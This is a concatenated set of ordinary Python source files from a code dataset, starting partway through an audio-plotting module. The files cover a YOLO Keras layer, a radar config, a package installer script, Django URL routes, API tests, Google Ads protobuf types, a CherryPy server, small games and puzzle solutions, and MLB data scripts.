librosa.amplitude_to_db(np.abs(librosa.stft(y)), ref=np.max)\n    img = librosa.display.specshow(D, x_axis='time', y_axis='log', ax=ax)\n    ax.set(title='Log-scale spectrogram')\n    fig.colorbar(img, ax=ax, format=\"%+2.f dB\")\n\n    return plt.gcf()\n\n\ndef plot_mel_spectrogram(y, sr):\n    plt.close(\"all\")\n    fig, ax = plt.subplots()\n    M = librosa.feature.melspectrogram(y=y, sr=sr)\n    M_db = librosa.power_to_db(M, ref=np.max)\n    img = librosa.display.specshow(M_db, y_axis='mel', x_axis='time', ax=ax)\n    ax.set(title='Mel-scale spectrograms')\n    fig.colorbar(img, ax=ax, format=\"%+2.f dB\")\n\n    return plt.gcf()\n\n\ndef plot_mfccs(y):\n    plt.close('all')\n    fig, ax = plt.subplots()\n    mfccs = librosa.feature.mfcc(y=y, n_mfcc=80)\n    img = librosa.display.specshow(mfccs, x_axis='time', ax=ax)\n    ax.set(title='MFCCs')\n    fig.colorbar(img, ax=ax)\n\n    return plt.gcf()\n\n\ndef plot_wave(y, sr):\n    plt.close('all')\n    fig, ax = plt.subplots()\n    img = librosa.display.waveplot(y, sr=sr, x_axis='time', ax=ax)\n    ax.set(title='Waveplot')\n\n    return plt.gcf()\n\n","sub_path":"audio_loading_utils.py","file_name":"audio_loading_utils.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"371837339","text":"\"\"\"Contains common building blocks for yolo neural networks.\"\"\"\nfrom functools import partial\n\nimport tensorflow as tf\nimport tensorflow.keras as ks\nimport tensorflow.keras.backend as K\nfrom ._Identity import Identity\n\nfrom yolo.modeling.functions.mish_activation import mish\n\n\n@ks.utils.register_keras_serializable(package='yolo')\nclass DarkConv(ks.layers.Layer):\n    def __init__(\n            self,\n            filters=1,\n
            kernel_size=(1, 1),\n            strides=(1, 1),\n            padding='same',\n            dilation_rate=(1, 1),\n            use_bias=True,\n            kernel_initializer='glorot_uniform',\n            bias_initializer='zeros',\n            bias_regularizer=None,\n            l2_regularization=5e-4,  # default; TODO: find where this value is stated\n            use_bn=True,\n            use_sync_bn=False,\n            norm_moment=0.99,\n            norm_epsilon=0.001,\n            activation='leaky',\n            leaky_alpha=0.1,\n            **kwargs):\n        '''\n        Modified Convolution layer to match that of the DarkNet Library\n\n        Args:\n            filters: integer for output depth, or the number of features to learn\n            kernel_size: integer or tuple for the shape of the weight matrix or kernel to learn\n            strides: integer or tuple for how much to move the kernel after each kernel use\n            padding: string 'valid' or 'same'; if 'same', pad the image, else do not\n            dilation_rate: tuple to indicate how much to modulate kernel weights and\n                how many pixels in a feature map to skip\n            use_bias: boolean to indicate whether to use bias in the convolution layer\n            kernel_initializer: string to indicate which function to use to initialize weights\n            bias_initializer: string to indicate which function to use to initialize bias\n            l2_regularization: float to use as a constant for weight regularization\n            use_bn: boolean for whether to use batch normalization\n            use_sync_bn: boolean for whether to sync the batch normalization statistics\n                of all batch norm layers to the model's global statistics (across all input batches)\n            norm_moment: float for the momentum to use for batch normalization\n            norm_epsilon: float for the batch normalization epsilon\n            activation: string or None for the activation function to use in the layer;\n                if None, activation is replaced by linear\n            leaky_alpha: float to use as alpha if the activation function is leaky\n            **kwargs: Keyword Arguments\n\n        '''\n\n        # convolution params\n        self._filters = filters\n        self._kernel_size = kernel_size\n        self._strides = strides\n        self._padding = padding\n        self._dilation_rate = dilation_rate\n        self._use_bias = use_bias\n        self._kernel_initializer = kernel_initializer\n        self._bias_initializer = bias_initializer\n        self._l2_regularization = l2_regularization\n        self._bias_regularizer = bias_regularizer\n\n        # batchnorm params\n        self._use_bn = use_bn\n        if self._use_bn:\n            self._use_bias = False\n        self._use_sync_bn = use_sync_bn\n        self._norm_moment = norm_moment\n        self._norm_epsilon = norm_epsilon\n\n        if tf.keras.backend.image_data_format() == 'channels_last':\n            # format: (batch_size, height, width, channels)\n            self._bn_axis = -1\n        else:\n            # format: (batch_size, channels, width, height)\n            self._bn_axis = 1\n\n        # activation params\n        if activation is None:\n            self._activation = 'linear'\n        else:\n            self._activation = activation\n        self._leaky_alpha = leaky_alpha\n\n        super(DarkConv, self).__init__(**kwargs)\n        return\n\n    def build(self, input_shape):\n        kernel_size = self._kernel_size if type(\n            self._kernel_size) == int else self._kernel_size[0]\n        if self._padding == \"same\" and kernel_size != 1:\n            self._zeropad = ks.layers.ZeroPadding2D(\n                ((1, 1), (1, 1)))  # symmetric padding\n        else:\n            self._zeropad = Identity()\n\n        self.conv = ks.layers.Conv2D(\n            filters=self._filters,\n            kernel_size=self._kernel_size,\n            strides=self._strides,\n            padding=\"valid\",  #self._padding,\n            dilation_rate=self._dilation_rate,\n            use_bias=self._use_bias,\n            kernel_initializer=self._kernel_initializer,\n            bias_initializer=self._bias_initializer,\n            kernel_regularizer=ks.regularizers.l2(self._l2_regularization),\n            bias_regularizer=self._bias_regularizer)\n\n        #self.conv = tf.nn.convolution(filters=self._filters, strides=self._strides, 
padding=self._padding\n        if self._use_bn:\n            if self._use_sync_bn:\n                self.bn = tf.keras.layers.experimental.SyncBatchNormalization(\n                    momentum=self._norm_moment,\n                    epsilon=self._norm_epsilon,\n                    axis=self._bn_axis)\n            else:\n                self.bn = ks.layers.BatchNormalization(\n                    momentum=self._norm_moment,\n                    epsilon=self._norm_epsilon,\n                    axis=self._bn_axis)\n        else:\n            self.bn = Identity()\n\n        if self._activation == 'leaky':\n            alpha = {\"alpha\": self._leaky_alpha}\n            self._activation_fn = partial(tf.nn.leaky_relu, **alpha)\n        elif self._activation == 'mish':\n            self._activation_fn = mish()\n        else:\n            self._activation_fn = ks.layers.Activation(\n                activation=self._activation)\n\n        super(DarkConv, self).build(input_shape)\n        return\n\n    def call(self, inputs):\n        x = self._zeropad(inputs)\n        x = self.conv(x)\n        x = self.bn(x)\n        x = self._activation_fn(x)\n        return x\n\n    def get_config(self):\n        # used to store/share parameters to reconstruct the model\n        layer_config = {\n            \"filters\": self._filters,\n            \"kernel_size\": self._kernel_size,\n            \"strides\": self._strides,\n            \"padding\": self._padding,\n            \"dilation_rate\": self._dilation_rate,\n            \"use_bias\": self._use_bias,\n            \"kernel_initializer\": self._kernel_initializer,\n            \"bias_initializer\": self._bias_initializer,\n            \"bias_regularizer\": self._bias_regularizer,\n            \"l2_regularization\": self._l2_regularization,\n            \"use_bn\": self._use_bn,\n            \"use_sync_bn\": self._use_sync_bn,\n            \"norm_moment\": self._norm_moment,\n            \"norm_epsilon\": self._norm_epsilon,\n            \"activation\": self._activation,\n            \"leaky_alpha\": self._leaky_alpha\n        }\n        layer_config.update(super(DarkConv, self).get_config())\n        return layer_config\n","sub_path":"yolo/modeling/building_blocks/_DarkConv.py","file_name":"_DarkConv.py","file_ext":"py","file_size_in_byte":6867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"317652826","text":"platform_info = {\n    'id' : 'ouba',\n    'location' : 'Outer Banks, NC',\n    ##### use bounding box (limits or polygon) to describe location\n    'lat' : (33.5, 38.), # degrees true (-) south, (+) north\n    'lon' : (-76, -73.), # degrees true (-) west, (+) east\n    'mvar' : -11, # degrees (-) west, (+) east\n    'nlat' : 83.,\n    'nlon' : 45.,\n    # 'mean_water_depth' : -8.14, # meters (-) down, (+) up\n    # 'mean_water_depth_time_period' : 'June 2006 - June 2008',\n    'institution' : 'nccoos',\n    # \n    'config_start_date' : '2013-11-01 00:00:00',\n    'config_end_date' : None, # None or yyyy-mm-dd HH:MM:SS\n    'packages' : ('hfr', ),\n    }\nsensor_info = {\n    'hfr' : { 'id' : 'hfr',\n              'description' : 'High Frequency RADAR Surface Current Totals',\n              'raw_dir' : '/seacoos/data/nccoos/level0/ouba/hfr_totals',\n              'raw_file_glob' : '*.tuv',\n              'proc_dir' : '/seacoos/data/nccoos/level1/ouba/hfr_totals',\n              'process_module' : 'proc_codar_totals',\n              'utc_offset' : 0, # hours offset to utc\n              'operating_frequency' : 4.5, # MHz\n              'averaging_radius' : 9.0, # kilometers\n              # 'plot_module' : 'ouba_totals_plot', \n              # 'plot_names' : ('vecmap',), \n              # 'csv_dir' : '/seacoos/data/nccoos/latest_csv',\n              # 'cvs_vars' : ('time','lat','lon','z','u','v'),\n              'latest_dir' : '/seacoos/data/nccoos/latest_v2.0',\n              'latest_vars' : ('time','lat','lon','z','u','v'),\n              },\n    }\n\n## NOTE: grid definition for totals based on 6km spacing and the bounding box\n# minlat, maxlat = (33.5, 38.)\n# minlon, maxlon = (-76, -73.)\n# midlat = minlat + 0.5*(maxlat-minlat)\n## ~111 km = 1 deg latitude\n# nlat = numpy.round((maxlat-minlat) *111/6)\n# nlon = numpy.round((maxlon-minlon) * 
math.cos(midlat*math.pi/180)*111/6)\n# nlat\n# >>> 83\n# nlon\n# >>> 45\n","sub_path":"ouba_config_20131101.py","file_name":"ouba_config_20131101.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"172099979","text":"#! /usr/bin/env python\n\nimport os\nimport sys\nimport urllib\nimport urllib2\nimport tarfile\nimport zipfile\nimport tempfile\nimport subprocess\n\ntry:\n    import simplejson as json\nexcept ImportError:\n    import json\n\n\nURL = 'http://pypi.python.org/pypi/pyg/json'\n\n\ndef log(msg):\n    return sys.stdout.write(msg + '\\n')\n\ndef unpack(path):\n    if tarfile.is_tarfile(path):\n        archive = tarfile.open(path)\n    elif zipfile.is_zipfile(path):\n        archive = zipfile.ZipFile(path)\n    else:\n        raise TypeError('Unknown file-type: {0}'.format(path))\n    tempdir = tempfile.mkdtemp()\n    archive.extractall(tempdir)\n    return os.path.join(tempdir, os.listdir(tempdir)[0])\n\ndef get_url():\n    data = urllib2.urlopen(URL).read()\n    json_data = json.loads(data)\n    installable = (release for release in json_data['urls'] if release['packagetype'] == 'sdist')\n    return min(installable, key=lambda item: item['size'])['url']\n\ndef install():\n    if '--dev' in sys.argv:\n        url = 'https://github.com/rubik/pyg/tarball/master'\n    else:\n        url = get_url()\n    log('Retrieving archive from {0}'.format(url))\n    path = urllib.urlretrieve(url)[0]\n    log('Unpacking archive...')\n    path = unpack(path)\n    setup_py = os.path.join(path, 'setup.py')\n    python = 'python{0}.{1}'.format(*sys.version_info[:2])\n    try:\n        log('Running setup.py install...')\n        subprocess.check_call([python, setup_py, 'install'], cwd=path)\n    except subprocess.CalledProcessError as e:\n        log('Installation failed. Installation command returned non-zero ' \\\n            'exit status: ' + str(e.returncode) + '\\n')\n\n\nif __name__ == '__main__':\n    install()","sub_path":"get-pyg.py","file_name":"get-pyg.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"255705800","text":"\"\"\"QI URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import:  from my_app import views\n    2. Add a URL to urlpatterns:  url(r'^$', views.home, name='home')\nClass-based views\n    1. Add an import:  from other_app.views import Home\n    2. Add a URL to urlpatterns:  url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Add an import:  from blog import urls as blog_urls\n    2. Add a URL to urlpatterns:  url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import *\nfrom django.contrib import admin\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom . 
import views\nfrom django.urls import path,re_path,reverse,include\n\napp_name=\"QI\"\n\n# NOTE: the angle-bracket parts of several patterns below (regex group names and\n# path converters) were lost when this file was extracted, so named groups are kept\n# here as plain positional capture groups.\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('', views.Home.as_view(),name='home'),\n    path('profiles', views.profiles, name=\"Person Profiles\"),\n    path('about', views.about, name=\"About Page\"),\n    path('base_explicit/', views.base_explicit, name='base explicit'),\n    path('base/', views.base, name='base non explicit'),\n    path('cornp1', views.cornp1, name=\"Henry Cornplanter\"),\n    path('places', views.places, name=\"Places page\"),\n    path('organizations', views.organizations, name=\"Organizations page\"),\n    path('manuscripts/', views.manuscripts, name=\"Manuscripts\"),\n    re_path(r'^page/(\S+_[0-9]{3})', views.pageinfo, name=\"page\"),\n    re_path(r'^pageinfo/(\S+_[0-9]{3})', views.newpageinfo, name=\"pageinfo\"),\n    re_path(r'^pagetranscription/(\S+_[0-9]{3})', views.pagetranscription, name=\"pagetranscription\"),\n    path('travelRoutes/', views.travelRoutes, name=\"TravelRoutes\"),\n    path('travelRoutes/', include('QI.inner')),\n    path('overviewmap_traveler', views.overviewmap_traveler, name='traveler'),\n    path('overviewmap_date', views.overviewmap_date, name='date'),\n    path('overviewmap_residence', views.overviewmap_residence, name='residence'),\n    path('overviewmap_popularlocations', views.overviewmap_popularlocations, name='overviewmap_popularlocations'),\n    path('historicalbackground', views.historicalbackground, name=\"historicalbackground\"),\n    path('usingthesite', views.usingthesite, name=\"usingthesite\"),\n    path('bibliography', views.bibliography, name=\"bibliography\"),\n    path('credits', views.credits, name=\"credits\"),\n    path('mapgallery', views.mapgallery, name=\"mapgallery\"),\n    path('contact', views.contact, name=\"contact\"),\n    path('contactSuccess', views.contactSuccess, name=\"contactSuccess\"),\n    path('admin/add_a_storymap',views.SMimport, name=\"StoryMapImporter\"),\n    path('admin/XML_to_HTML',views.new_xml_import, name=\"XMLImporter\"),\n    re_path(r'^person/(\S+)/', views.person_detail, name=\"person_detail\"),\n    re_path(r'^place/(\S+)/', views.place_detail, name=\"place_detail\"),\n    re_path(r'^org/(\S+)/', views.org_detail, name=\"org_detail\"),\n    re_path(r'^something/(\S+)', views.jsoninfo, name=\"testinfo2\"),\n    re_path(r'^manuscriptinfo/(\S+)/', views.pagejsoninfo, name=\"pagejsoninfo\"),\n    re_path(r'^outputPagePT/(\S+)/', views.outputPagePT, name=\"outputPagePT\"),\n    re_path(r'^outputManuPT/(\S+)/', views.outputManuPT, name=\"outputManuPT\"),\n    re_path(r'^outputPagePDF/(\S+)/', views.outputPagePDF, name=\"outputPagePDF\"),\n    path('outputAll', views.outputAll, name=\"outputAll\"),\n    path('search/',include('haystack.urls')),\n    path('transcribe', views.transcribe, name=\"Transcribe\"),\n    path('transcribepage/', views.transcribe_info, name=\"transcribepage\"),\n    path('admin/review_transcriptions/',staff_member_required(views.ReviewTranscriptionList.as_view()),name='admin_review_transcription_lists'),\n    path('admin/review_transcriptions//', views.review_transcription,name='admin_review_transcriptions'),\n    path('review_transcriptions', views.testing, name=\"testing\"),\n    path('inText_search', views.inText_search, name='searchInText'),\n]\n\n\nadmin.site.site_header = 'Beyond Penns Treaty'\nadmin.site.index_title = 'Beyond Penns Treaty Administration'\n","sub_path":"QI/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"423260271","text":"from shopdb.api import *\nimport shopdb.exceptions as exc\nfrom tests.base_api import BaseAPITestCase\nfrom flask import json\n\n\nclass ListReplenishmentCollectionsAPITestCase(BaseAPITestCase):\n\n def test_list_replenishment_collections_as_admin(self):\n \"\"\"Getting a list of all ReplenishmentCollections as admin\"\"\"\n self.insert_default_replenishmentcollections()\n res = self.get(url='/replenishmentcollections', role='admin')\n self.assertEqual(res.status_code, 200)\n data = json.loads(res.data)\n assert 'replenishmentcollections' in data\n replcolls = data['replenishmentcollections']\n required = ['id', 'timestamp', 'admin_id', 'price', 'revoked',\n 'comment']\n for replcoll in replcolls:\n assert all(x in replcoll for x in required)\n\n def test_list_replenishment_collections_as_user(self):\n \"\"\"Trying to get a list of all ReplenishmentCollections as user\"\"\"\n res = self.get(url='/replenishmentcollections', role='user')\n self.assertEqual(res.status_code, 401)\n self.assertException(res, exc.UnauthorizedAccess)\n","sub_path":"tests/test_api_list_replenishmentcollections.py","file_name":"test_api_list_replenishmentcollections.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"94239063","text":"def solution(record):\n result={}\n ans=[]\n cnt=0\n for i in record:\n s=i.split()\n if s[0]==\"Enter\":\n result[s[1]] = s[2]\n elif s[0]==\"Change\":\n result[s[1]] = s[2]\n\n for i in record:\n s=i.split()\n if s[0]==\"Enter\":\n ans.append(result[s[1]]+\"님이 들어왔습니다.\")\n elif s[0]==\"Leave\":\n ans.append(result[s[1]]+\"님이 나갔습니다.\")\n\n return ans\n\nsolution([\"Enter uid1234 Muzi\", \"Enter uid4567 Prodo\",\"Leave uid1234\",\"Enter uid1234 Prodo\",\"Change uid4567 Ryan\"])","sub_path":"오픈채팅방.py","file_name":"오픈채팅방.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"47443939","text":"# -*- coding: utf-8 -*-\n# Copyright 2023 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom __future__ import annotations\n\n\nimport proto # type: ignore\n\nfrom google.ads.googleads.v14.common.types import asset_policy\nfrom google.ads.googleads.v14.enums.types import (\n asset_performance_label as gage_asset_performance_label,\n)\nfrom google.ads.googleads.v14.enums.types import served_asset_field_type\n\n\n__protobuf__ = proto.module(\n package=\"google.ads.googleads.v14.common\",\n marshal=\"google.ads.googleads.v14\",\n manifest={\n \"AdTextAsset\",\n \"AdImageAsset\",\n \"AdVideoAsset\",\n \"AdMediaBundleAsset\",\n \"AdDiscoveryCarouselCardAsset\",\n \"AdCallToActionAsset\",\n },\n)\n\n\nclass AdTextAsset(proto.Message):\n r\"\"\"A text asset used inside an ad.\n .. 
_oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n text (str):\n Asset text.\n\n This field is a member of `oneof`_ ``_text``.\n pinned_field (google.ads.googleads.v14.enums.types.ServedAssetFieldTypeEnum.ServedAssetFieldType):\n The pinned field of the asset. This restricts\n the asset to only serve within this field.\n Multiple assets can be pinned to the same field.\n An asset that is unpinned or pinned to a\n different field will not serve in a field where\n some other asset has been pinned.\n asset_performance_label (google.ads.googleads.v14.enums.types.AssetPerformanceLabelEnum.AssetPerformanceLabel):\n The performance label of this text asset.\n policy_summary_info (google.ads.googleads.v14.common.types.AdAssetPolicySummary):\n The policy summary of this text asset.\n \"\"\"\n\n text: str = proto.Field(\n proto.STRING,\n number=4,\n optional=True,\n )\n pinned_field: served_asset_field_type.ServedAssetFieldTypeEnum.ServedAssetFieldType = proto.Field(\n proto.ENUM,\n number=2,\n enum=served_asset_field_type.ServedAssetFieldTypeEnum.ServedAssetFieldType,\n )\n asset_performance_label: gage_asset_performance_label.AssetPerformanceLabelEnum.AssetPerformanceLabel = proto.Field(\n proto.ENUM,\n number=5,\n enum=gage_asset_performance_label.AssetPerformanceLabelEnum.AssetPerformanceLabel,\n )\n policy_summary_info: asset_policy.AdAssetPolicySummary = proto.Field(\n proto.MESSAGE,\n number=6,\n message=asset_policy.AdAssetPolicySummary,\n )\n\n\nclass AdImageAsset(proto.Message):\n r\"\"\"An image asset used inside an ad.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n asset (str):\n The Asset resource name of this image.\n\n This field is a member of `oneof`_ ``_asset``.\n \"\"\"\n\n asset: str = proto.Field(\n proto.STRING,\n number=2,\n optional=True,\n )\n\n\nclass AdVideoAsset(proto.Message):\n r\"\"\"A video asset used inside an ad.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n asset (str):\n The Asset resource name of this video.\n\n This field is a member of `oneof`_ ``_asset``.\n \"\"\"\n\n asset: str = proto.Field(\n proto.STRING,\n number=2,\n optional=True,\n )\n\n\nclass AdMediaBundleAsset(proto.Message):\n r\"\"\"A media bundle asset used inside an ad.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n asset (str):\n The Asset resource name of this media bundle.\n\n This field is a member of `oneof`_ ``_asset``.\n \"\"\"\n\n asset: str = proto.Field(\n proto.STRING,\n number=2,\n optional=True,\n )\n\n\nclass AdDiscoveryCarouselCardAsset(proto.Message):\n r\"\"\"A discovery carousel card asset used inside an ad.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n asset (str):\n The Asset resource name of this discovery\n carousel card.\n\n This field is a member of `oneof`_ ``_asset``.\n \"\"\"\n\n asset: str = proto.Field(\n proto.STRING,\n number=1,\n optional=True,\n )\n\n\nclass AdCallToActionAsset(proto.Message):\n r\"\"\"A call to action asset used inside an ad.\n .. 
_oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n asset (str):\n The Asset resource name of this call to\n action asset.\n\n This field is a member of `oneof`_ ``_asset``.\n \"\"\"\n\n asset: str = proto.Field(\n proto.STRING,\n number=1,\n optional=True,\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n","sub_path":"google/ads/googleads/v14/common/types/ad_asset.py","file_name":"ad_asset.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"612361246","text":"import cherrypy\nimport os\n\n\nclass Root:\n def __init__(self):\n pass\n\n @cherrypy.expose()\n def old(self):\n return load_html('data-browser.html')\n\n @cherrypy.expose(['index'])\n def new(self):\n html = load_html('data-browser.html')\n html = html.replace('js/demo_old.js', 'js/demo_new.js')\n return html\n\n\ndef load_html(file_name):\n lines = open(os.path.join(MEDIA_DIR, file_name), \"r\").readlines()\n return \"\".join(lines)\n\n\nMEDIA_DIR = os.path.join(os.path.abspath(\".\"))\nQUICKSTART_CONFIG = {\n \"/\": {\n \"tools.staticdir.root\": MEDIA_DIR,\n \"tools.etags.on\": True,\n \"tools.etags.autotags\": True,\n \"tools.gzip.on\": True\n },\n \"/css\": {\n \"tools.staticdir.on\": True,\n \"tools.staticdir.dir\": \"css\"\n },\n \"/js\": {\n \"tools.staticdir.on\": True,\n \"tools.staticdir.dir\": \"js\"\n },\n \"/data\": {\n \"tools.staticdir.on\": True,\n \"tools.staticdir.dir\": \"data\"\n },\n}\n\nif __name__ == \"__main__\":\n cherrypy.config.update({\n \"server.socket_host\": \"0.0.0.0\",\n \"server.socket_port\": 80,\n })\n cherrypy.quickstart(Root(), \"\", config=QUICKSTART_CONFIG)\n\n\n","sub_path":"run_server.py","file_name":"run_server.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"63232024","text":"#-----------------------------------------------------------------------------\n# Copyright (c) 2013, PyInstaller Development Team.\n#\n# Distributed under the terms of the GNU General Public License with exception\n# for distributing bootloader.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n#-----------------------------------------------------------------------------\n\n\nhiddenimports = [\n \"allcontrols\",\n \"asianhotkey\",\n \"comboboxdroppedheight\",\n \"comparetoreffont\",\n \"leadtrailspaces\",\n \"miscvalues\",\n \"missalignment\",\n \"missingextrastring\",\n \"overlapping\",\n \"repeatedhotkey\",\n \"translation\",\n \"truncation\",\n]\n","sub_path":"pyupdater/vendor/PyInstaller/hooks/hook-pywinauto.tests.py","file_name":"hook-pywinauto.tests.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"631606089","text":"#!/usr/bin/python\nimport Operators as O\n\n\ndef main():\n controler = O.ModelOperator(\"/home/gbaranowski/etc/VWT/model2.ini\")\n controler.register()\n controler.verify()\n controler.summarize()\n controler.run()\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"439841733","text":"import random\r\n\r\ngameList = [\"Rock\", \"Paper\", \"Scissor\"]\r\nuserScore = 0\r\ncomputerScore = 0\r\n\r\nwhile 
True:\r\n userChoice = input(\"Choose Rock, Paper or Scissors: \")\r\n compChoice = gameList[random.randint(0, 2)]\r\n\r\n if userChoice in [\"r\", \"R\", \"rock\", \"ROCK\", \"Rock\"]:\r\n userChoice = \"Rock\"\r\n elif userChoice in [\"p\", \"P\", \"paper\", \"PAPER\", \"Paper\"]:\r\n userChoice = \"Paper\"\r\n elif userChoice in [\"s\", \"S\", \"scissor\", \"SCISSOR\", \"Scissor\"]:\r\n userChoice = \"Scissor\"\r\n else:\r\n print(\"\\nIncorrect input. Try Again.\")\r\n print(\"================================================================\\n\")\r\n continue\r\n\r\n if userChoice == \"Rock\" and compChoice == \"Scissor\":\r\n result = \" You win!\"\r\n userScore += 1\r\n elif userChoice == \"Paper\" and compChoice == \"Rock\":\r\n result = \" You win!\"\r\n userScore += 1\r\n elif userChoice == \"Scissor\" and compChoice == \"Paper\":\r\n result = \" You win!\"\r\n userScore += 1\r\n elif userChoice == compChoice:\r\n result = \" You're tied. Try Again.\"\r\n else:\r\n result = \" You lose!\"\r\n computerScore += 1\r\n\r\n print(\"\\nYou choose \" + userChoice + \". The computer choose \" + compChoice + \".\" + result)\r\n\r\n print(\"\\nPlayer wins: \" + str(userScore) + \"\\nComputer wins: \" + str(computerScore))\r\n\r\n userTryAgain = input(\"\\nDo you want to try again? (Y|N) \")\r\n if userTryAgain in [\"y\", \"Y\", \"YES\", \"yes\", \"Yes\"]:\r\n print(\"\\n================================================================\\n\")\r\n pass\r\n elif userTryAgain in [\"n\", \"N\", \"NO\", \"no\", \"No\"]:\r\n print(\"\\nThanks for playing\")\r\n print(\"================================================================\\n\")\r\n break\r\n else:\r\n print(\"\\nThanks for playing\")\r\n print(\"================================================================\\n\")\r\n break\r\n","sub_path":"rockPaperScissor.py","file_name":"rockPaperScissor.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"182644466","text":"from collections import Counter\n\nn = int(input())\nnums = list(map(int, input().strip().split()))\n\nnums.sort()\n\nmaxx = nums[-1]-nums[0]\nmax_v = nums[-1]\nmin_v = nums[0]\n\nc = Counter(nums)\n\nif (c[max_v] == n):\n print(maxx, (c[max_v]*(c[max_v]-1))//2)\nelse:\n print(maxx, c[max_v]*c[min_v])\n","sub_path":"Codeforces Rating --1300/459B.py","file_name":"459B.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"26909153","text":"import numpy as np\r\nimport pandas as pd\r\nfrom collections import OrderedDict, defaultdict\r\nfrom mlb_classes1 import Players\r\nfrom open_dict import daily_lineups_pitch, date\r\n\r\n# Need to fix information on traded players (Team, Park, Defensive Data)\r\n\r\ndf = pd.read_csv(\"MLB/game_date_info1.csv\", encoding='latin-1')\r\ndf['date'] = list(map((lambda x:date(x)), df['date']))\r\ndf['Date_Team'] = list(map((lambda x,y:x + ' ' + y), df['date'], df['team_home']))\r\ndf['Date_Team_H'] = list(map((lambda x,y:x + ' ' + y), df['date'], df['team_away']))\r\n\r\n\r\nfrom constant_variables import g_df_away_titles, g_df_away_cols\r\ngame_dataframe_away = Players(data = df, column_names = g_df_away_cols, column_titles = g_df_away_titles)\r\n\r\ngame_dataframe_home = Players(data = df, \r\n column_names = ['Date_Team_H', 'date', 'team_home', 'team_away', 'pitcher_away', 'expected_runs_home', 'actual_runs_home', \r\n 'temp', 'humidity', 'rain', 'league'],\r\n 
column_titles = ['Date_Team', 'Date', 'Team_Bat', 'Stadium', 'Team_Pitch', 'Expected_Runs', 'Runs', 'Temp', \r\n 'Humidity', 'Rain', 'League'])\r\n\r\n\r\n# Create Instance from Class\r\ngame_frames_away = game_dataframe_away.create_df()\r\ngame_frames_home = game_dataframe_home.create_df()\r\ngame_frames = pd.concat([game_frames_away,game_frames_home])\r\n\r\ngame_dataframe = Players(data = game_frames, \r\n column_names = ['Date_Team', 'Date', 'Team_Bat', 'Stadium', 'Team_Pitch', 'Expected_Runs', 'Runs', 'Temp', \r\n 'Humidity', 'Rain', 'League'],\r\n column_titles = ['Date_Team', 'Date', 'Team_Bat', 'Stadium', 'Team_Pitch', 'Expected_Runs', 'Runs', 'Temp', \r\n 'Humidity', 'Rain', 'League'])\r\n\r\n# Create Dictionary from Data\r\ngame_dic1 = game_dataframe.create_dict('Date_Team')\r\ngame_dict_list = game_dic1[1]\r\ngame_dict_dates = game_dic1[2]\r\n\r\n\r\ndf1 = pd.read_csv(\"MLB/batter_all.csv\", encoding='latin-1')\r\ndf1['mlb_team_long'] = list(map((lambda x:x.upper()), df1['mlb_team_long']))\r\ndiv_9 = ['R_batter_Std', 'SO_batter_Std', 'RBI_batter_Std', 'DP_batter_Std', 'R_RIGHTbatter_Std', \r\n 'TB_RIGHTbatter_Std', 'SO_RIGHTbatter_Std', 'RBI_RIGHTbatter_Std', 'DP_RIGHTbatter_Std', 'R_LEFT_batter_Std', \r\n 'TB_LEFT_batter_Std', 